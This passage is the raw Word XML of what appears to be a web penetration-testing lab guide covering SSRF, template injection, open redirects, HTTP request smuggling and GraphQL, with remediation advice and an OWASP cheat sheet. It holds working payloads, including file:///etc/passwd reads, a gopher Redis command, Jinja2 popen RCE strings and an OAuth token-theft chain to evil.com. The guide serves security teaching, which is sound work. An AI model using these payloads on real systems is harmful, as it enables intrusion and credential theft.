          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain-based bypasses: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http://localtest.me/         ← resolves to 127.0.0.1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http://127.0.0.1.xip.io/    ← wildcard DNS to localhost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http://EVIL.COM/            ← DNS rebinding (register domain → resolve to 127.0.0.1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">URL parsing confusion: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http://evil.com\@target.com/   ← some parsers ignore target.com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http://target.com@evil.com/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http://evil.com%23target.com/  ← fragment confusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol-based attacks: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file:///etc/passwd             ← local file read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dict://127.0.0.1:6379/info     ← Redis info dump</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gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a  ← Redis RCE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ftp://127.0.0.1:21/           ← FTP service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10.4 Blind SSRF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Use out-of-band interaction server to detect blind SSRF:</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Start interactsh listener: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interactsh-client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Use generated URL as SSRF payload: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url=http://abcdef1234.oast.fun/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If server makes request, interactsh logs DNS + HTTP interaction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This confirms SSRF even with no response visible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10.5 Remediation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D5F5E3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">How to Fix</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Validate and allowlist URLs against a strict allowlist of allowed domains/IPs. Block requests to private IP ranges (10.x, 172.16-31.x, 192.168.x, 127.x, 169.254.x) at the network layer. Disable unnecessary URL scheme support (file://, gopher://, dict://). Use IMDSv2 in AWS (requires session token — blocks IMDSv1 SSRF). Segment internal services so the web server cannot reach them directly.</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Bonus — Additional Critical Attack Vectors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SSTI — Server-Side Template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922B21" w:sz="6"/>
              <w:left w:val="single" w:color="922B21" w:sz="6"/>
              <w:bottom w:val="single" w:color="922B21" w:sz="6"/>
              <w:right w:val="single" w:color="922B21" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="922B21"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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7860"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="922B21" w:sz="4"/>
              <w:left w:val="single" w:color="922B21" w:sz="4"/>
              <w:bottom w:val="single" w:color="922B21" w:sz="4"/>
              <w:right w:val="single" w:color="922B21" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FADBD8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Template injection into Jinja2, Twig, Freemarker, or other engines leads directly to Remote Code Execution on the server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection — inject math expressions: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{{7*7}}     → 49 = Jinja2/Twig vulnerable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${7*7}      → 49 = FreeMarker/Thymeleaf</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&lt;%= 7*7 %&gt;  → 49 = ERB (Ruby)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#{7*7}      → 49 = Pebble/Smarty</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*{7*7}      → 49 = Spring Expression Language</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Jinja2 (Flask/Python) — RCE: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{{config.__class__.__init__.__globals__['os'].popen('id').read()}}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{{''.__class__.__mro__[1].__subclasses__()}}  ← list all classes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Find subprocess.Popen in the list, then call it for RCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Twig (PHP) — RCE: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{{_self.env.registerUndefinedFilterCallback("exec")}}</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{{_self.env.getFilter("id")}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">tplmap automation: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tplmap -u "https://target.com/render?name=*"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tplmap -u "https://target.com/page" --data "template=*"</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Open Redirect</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Open redirect allows an attacker to redirect users from a trusted domain to a malicious site. Commonly chained with phishing attacks and OAuth token theft.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic payloads: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?redirect=https://evil.com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?url=//evil.com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?next=\/\/evil.com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?goto=%2F%2Fevil.com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?redirect=https://target.com.evil.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">OAuth token theft via open redirect — critical chain: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1. Find OAuth flow: /oauth/authorize?redirect_uri=https://target.com/callback</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2. Find open redirect on target.com: /redirect?url=https://evil.com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3. Chain them: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/oauth/authorize?redirect_uri=https://target.com/redirect?url=https://evil.com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OAuth server sends token to target.com, which redirects to evil.com with token</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HTTP Request Smuggling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Request smuggling exploits discrepancies in how front-end and back-end servers parse HTTP requests. It can bypass security controls, poison caches, and capture other users' requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CL.TE (Content-Length on front-end, Transfer-Encoding on back-end):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POST / HTTP/1.1</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Host: target.com</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Content-Length: 13</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Transfer-Encoding: chunked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0</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SMUGGLED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Burp HTTP Request Smuggler extension:</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Install from BApp Store: HTTP Request Smuggler</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Right-click request → Extensions → HTTP Request Smuggler → Smuggle probe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 Automatically detects CL.TE, TE.CL, and TE.TE variants</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="154360"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">GraphQL Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">GraphQL introspection — dump entire schema:</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POST /graphql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{"query": "{ __schema { types { name fields { name type { name } } } } }"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Common GraphQL vulnerabilities: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1. Introspection enabled in production → full schema leakage</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2. No depth limiting → DoS with deeply nested queries</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3. No rate limiting → brute force credentials via GraphQL</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4. Batching attacks → send 100 login mutations in one request</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5. IDOR through GraphQL → query other users' objects by ID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="C0392B" w:sz="12"/>
        </w:pBdr>
        <w:shd w:fill="1C2833" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E8F8F5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6. SQL/NoSQL injection in resolvers → same as REST API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6"/>
              <w:left w:val="single" w:color="1E8449" w:sz="24"/>
              <w:bottom w:val="single" w:color="1E8449" w:sz="6"/>
              <w:right w:val="single" w:color="1E8449" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="E8F8F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Final Note from Your Security Architect</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">After 30 years in this field, the biggest lesson is this: automation finds the low-hanging fruit, but manual testing finds the crown jewels. Always understand what the application is supposed to do before trying to break it. The best findings come from thinking like a developer, then acting like an attacker. Document every step — a PoC without reproduction steps is just noise. Good luck in the lab.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="922B21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Quick Reference — Attack Vectors Cheat Sheet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80"/>
        <w:gridCol w:w="2580"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="154360" w:sz="6"/>
              <w:left w:val="single" w:color="154360" w:sz="6"/>
              <w:bottom w:val="single" w:color="154360" w:sz="6"/>
              <w:right w:val="single" w:color="154360" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="154360" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="154360" w:sz="6"/>
              <w:left w:val="single" w:color="154360" w:sz="6"/>
              <w:bottom w:val="single" w:color="154360" w:sz="6"/>
              <w:right w:val="single" w:color="154360" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="154360" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2580"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="154360" w:sz="6"/>
              <w:left w:val="single" w:color="154360" w:sz="6"/>
              <w:bottom w:val="single" w:color="154360" w:sz="6"/>
              <w:right w:val="single" w:color="154360" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="154360" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Key Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2580"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="154360" w:sz="6"/>
              <w:left w:val="single" w:color="154360" w:sz="6"/>
              <w:bottom w:val="single" w:color="154360" w:sz="6"/>
              <w:right w:val="single" w:color="154360" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="154360" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Top Payloads/Checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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2C3E50"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">A01 - Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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922B21"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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ffuf, Burp Repeater</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IDOR, priv escalation, forced browsing</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2C3E50"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">A02 - Crypto Failures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D35400"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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jwt_tool, testssl.sh</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JWT alg:none, weak secrets, no HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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2C3E50"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">A03 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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922B21"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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sqlmap, dalfox, commix</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SQLi, XSS, RCE, XXE, SSTI</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2C3E50"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">A04 - Insecure Design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D35400"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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Burp, manual</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Business logic, race conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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2C3E50"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">A05 - Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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D35400"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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nuclei, nikto</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Headers, CORS, default creds, /actuator</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2C3E50"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">A06 - Outdated Components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D35400"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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nuclei, retire.js</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CVE scanning, version fingerprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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2C3E50"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">A07 - Auth Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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D35400"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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hydra, ffuf</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Brute force, MFA bypass, session fixation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2C3E50"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">A08 - Integrity Failures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D35400"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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ysoserial, phpggc</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Deserialization RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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2C3E50"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">A09 - Logging Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="200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bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</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Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2580"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="2"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="2"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="2"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">No alerts, verbose errors, log injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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2C3E50"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">A10 - SSRF</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bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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interactsh, manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="258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tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Metadata service, internal network scan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2026-02-25T00:34:07.973Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-25T00:34:07.974Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>